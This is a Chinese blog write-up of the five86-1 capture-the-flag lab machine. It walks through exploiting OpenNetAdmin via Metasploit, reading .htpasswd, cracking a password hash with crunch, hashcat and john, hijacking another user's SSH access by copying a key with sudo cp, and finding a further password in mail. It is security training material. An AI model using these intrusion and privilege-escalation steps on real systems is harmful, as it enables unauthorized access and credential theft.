five86-1 kali:192.168.0.105 靶机:192.168.0.194 ![](https://img-blog.csdnimg.cn/2e15469afc2f45718522b1e0c4d30309.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_20,color_FFFFFF,t_70,g_se,x_16) ![](http://data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)
可以看到开放了 22、80、10000 三个端口,并且 80 端口存在 robots.txt 和路径 /ona robots.txt懒得看了 基本上都没啥 ![](https://img-blog.csdnimg.cn/5fa1d2c8a76d45f7ba823d9fb1963161.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_20,color_FFFFFF,t_70,g_se,x_16) ![](http://data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)
或者searchsploit.不过这里有个坑点,就是要对这个bash脚本进行转换格式,否则会报错,使用dos2unix 47691.sh这个命令,而且这里的shell不能转成TTY 然而这里我用msf .msfconsole search opennetadmin use 0 set rhost 192..168.0.194 set lhost 192.168.0.105 show options run ![](https://img-blog.csdnimg.cn/b3e77fd4700f4c3a917e3e7e12477e9f.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_20,color_FFFFFF,t_70,g_se,x_16) ![](http://data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)
惯例python提权 python -c 'import pty;pty.spawn("/bin/sh")' ![](https://img-blog.csdnimg.cn/c3acbad988c7462e8d25ca474e182b37.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_20,color_FFFFFF,t_70,g_se,x_16) ![](http://data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)
看到有五个账户 读取 var/www/html/reports/.htaccess 可以找到 AuthUserFile 的路径 /var/www/.htpasswd ![](https://img-blog.csdnimg.cn/447af01127524d4d94ca9c2383d85f83.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_13,color_FFFFFF,t_70,g_se,x_16) ![](http://data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==) cat进去看看
![](https://img-blog.csdnimg.cn/6f61414921f74789ba1fe81262b2927f.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_10,color_FFFFFF,t_70,g_se,x_16)
提示这个目录
![](https://img-blog.csdnimg.cn/53006e1989344c32a0ddb0a3c90cb6aa.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_20,color_FFFFFF,t_70,g_se,x_16)
读取这个文件如下,可以得到用户名 douglas 和HASH的密码$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1 ,给的提示是 只包含aefhrt的十个字符 先用hash-identifier看一下是哪个HASH ![](https://img-blog.csdnimg.cn/428d101507dd43998a3bafcc39b430ed.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_20,color_FFFFFF,t_70,g_se,x_16) ![](http://data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)
结果 hash -type : [+] MD5(APR) 然后使用 crunch 生成对应的字典,命令格式 crunch <min-len> <max-len> [charset string] [options] ,这里生成只包含aefhrt的10个字符,就可以使用如下命令 crunch 10 10 aefhrt -o five86-1.txt ,更多的介绍可以看Linux下的字典生成工具Crunch和crunch命令详解 ![](https://img-blog.csdnimg.cn/721a3f375a3d4cafb3cc3fdc28038cda.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_20,color_FFFFFF,t_70,g_se,x_16) ![](http://data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)
对于这个密码表有两种破解方法 保存加密密码$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1为hash.txt ①hashcat hash|hashfile|hccapxfile [dictionary|mask|directory]...`,这里使用的命令为`hashcat -m 1600 -a 0 -o res hash.txt five86-1.txt //-m是HASH类别,-a是攻击方式,-o是输出结果 ② john破解 john --wordlist=five86-1.txt hash.txt
![](https://img-blog.csdnimg.cn/271006d851ce4ca2ae4966229e3ddaf0.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_20,color_FFFFFF,t_70,g_se,x_16) ![](http://data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==) 密码fatherrrrr
![](https://img-blog.csdnimg.cn/604ecf941f8745c0b1918ef18d9a366c.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_16,color_FFFFFF,t_70,g_se,x_16)
ok sudo -l 看可以在哪些地方执行命令或者权限 ![](https://img-blog.csdnimg.cn/aa2e31ba5c224374b4ab659b02f6928d.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_15,color_FFFFFF,t_70,g_se,x_16) ![](http://data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)
jen用户有cp命令.但是只能用jen的cp命令,且没有jen的密码 如果jen用户下的/home/jen/.ssh/authorized_keys包含douglas的公钥,那就可以用douglas的id_rsa文件登陆jen的ssh,也即免密登陆jen的ssh。 可以直接利用cp命令将douglas的公钥替换jen的公钥 生成ssh秘钥 ssh-keygen -b 2048 ![](https://img-blog.csdnimg.cn/fbd339ad542746779fdcce50a610bc5f.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_20,color_FFFFFF,t_70,g_se,x_16) ![](http://data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)
替换公钥 cp /home/douglas/.ssh/id_rsa.pub /tmp/authorized_keys 这里复制到/tmp目录下是因为jen没有权限访问douglas目录下的文件 cd /tmp chmod +x authorized_keys sudo -u jen /bin/cp authorized_keys /home/jen/.ssh/ ![](https://img-blog.csdnimg.cn/1c4a02197f1744d0a79cbce934a83bf7.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_20,color_FFFFFF,t_70,g_se,x_16) ![](http://data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)
本地连接jen ![](https://img-blog.csdnimg.cn/635eba2cbe1f4e24ba5014ad4a3b9857.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_20,color_FFFFFF,t_70,g_se,x_16) ![](http://data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==) 提示我们查看mail
看到提示mail,还是先执行echo $(find / -type f -user jen) > 1.txt 后cat 1.txt看一下,有一个/var/mail/jen的文件可以读取 cd /var/mail ls cat jen ![](https://img-blog.csdnimg.cn/5b6dd1741172431d81ad9b4fa1e38ec6.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_20,color_FFFFFF,t_70,g_se,x_16) ![](http://data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)
他说moss密码改为Fire!Fire! 切换moss用户 ![](https://img-blog.csdnimg.cn/63dba20178ab46b6bd91723431e8b1dc.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_9,color_FFFFFF,t_70,g_se,x_16) ![](http://data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==) 在.game目录发现了一个隐藏目录.games,访问后发现一个root权限的二进制文件upyourgame
![](https://img-blog.csdnimg.cn/946f09e4b1d147aaa5e36684e0910190.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_20,color_FFFFFF,t_70,g_se,x_16)
运行它
![](https://img-blog.csdnimg.cn/045bfbb7fb3c40e2af4e6a8a77c4a9d7.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_20,color_FFFFFF,t_70,g_se,x_16)
ok
|